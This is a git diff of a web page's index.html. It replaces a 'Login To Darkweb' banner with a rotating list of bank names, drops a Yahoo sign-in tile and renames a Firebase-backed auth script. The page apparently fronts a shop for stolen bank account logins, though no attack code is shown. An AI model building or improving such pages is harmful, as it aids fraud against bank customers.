--- a/public/index.html
+++ b/public/index.html
@@ -34,8 +34,13 @@
             <div class="col-12 center-col banner-col" style="text-align: center !important;">
                 <h1 class="banner-headline clip">
                     <span class="banner-words-wrapper">
-                        <b class="is-visible">Login To</b>
-                        <b>Darkweb</b>
+                        <b class="is-visible">Chase Bank</b>
+                        <b>Chime Bank</b>
+                        <b>Citi Bank</b>
+                        <b>R.B.C Bank</b>
+                        <b>Huntington</b>
+                        <b>Wells Fargo</b>
+                        <b>Bank America</b>
                     </span>
                 </h1>
             </div>
@@ -65,7 +70,7 @@
                 <blink>Best</blink>
             </div>
 
-            <div class="col-lg-3 col-md-65 col-sm-6 col-55 center-col">
+            <div class="col-lg-3 col-md-65 col-sm-6 col-55 center-col sm-display-none">
                 <div class="port" id="signGoogle" data-bs-toggle="modal" data-bs-target="#emailModal">
                     <a class="bro" style="background: blanchedalmond !important; border-radius: 3px 3px 0 0 !important;">
                         <div>
@@ -103,27 +108,6 @@
                         </a>
                     </h4>
                 </div>
-            </div>
-
-            <div class="col-lg-3 col-md-65 col-sm-6 col-55 center-col lg-display-none" style="opacity: 0.92 !important;">
-                <div class="port" id="signYahoo" data-bs-toggle="modal" data-bs-target="#emailModal">
-                    <a class="bro google" style="background: lightcyan !important;">
-                        <div>
-                            <img src="img/partners/yahoz.png">
-                        </div>
-                        <div class="bro-text">
-                            <p>
-                                Login.
-                            </p>
-                        </div>
-                    </a>
-                    <h4>
-                        <a class="butn">
-                            Yahoo ID
-                        </a>
-                    </h4>
-                </div>
-                <blink>New</blink>
             </div>
         
 
@@ -219,7 +203,7 @@
     <script src="js/main/core.index.js"></script>
     <script src="https://www.gstatic.com/firebasejs/7.23.0/firebase-app.js"></script>
     <script src="https://www.gstatic.com/firebasejs/7.23.0/firebase-auth.js"></script>
-    <script src="js/auth/gle.js"></script>
+    <script src="js/auth/login.js"></script>
 
 </body>
 </html>
